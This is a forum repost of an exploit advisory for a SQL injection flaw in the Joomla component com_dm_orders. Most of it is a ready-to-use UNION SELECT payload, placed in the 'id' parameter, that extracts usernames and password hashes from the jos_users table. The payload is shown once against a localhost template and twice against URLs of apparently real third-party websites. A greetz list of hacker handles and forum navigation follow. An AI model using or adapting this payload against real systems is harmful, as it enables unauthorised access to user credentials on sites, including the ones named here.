Joomla DM Orders SQLi Vuln

trxtxx · January 7, 2010

[o] Joomla Components [ com_dm_orders ] SQL Injection Vulnerability

Software : com_dm_orders [ joomla components ]

Author : NoGe

Contact : noge[dot]code[at]gmail[dot]com


  [o] Exploit

       http://localhost/[path]/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+jos_users--&Itemid=1



  [o] Proof of Concept

       http://www.yourownconsultingbusiness.com/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+jos_users--&Itemid=54
       http://www.shop.isecure-key.com/index.php?option=com_dm_orders&task=order_form&payment_method=Paypal&id=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9+from+jos_users--&Itemid=54

[o] Greetz

Anti Security [ Anti Security Team ]

Vrs-hCk OoN_BoY Paman zxvf Angela Zhang aJe

H312Y yooogy mousekill }^-^{ martfella noname s4va

skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke

Sign In

Joomla DM Orders SQLi Vuln

Recommended Posts

trxtxx

Join the conversation

Browse

Activity

Pages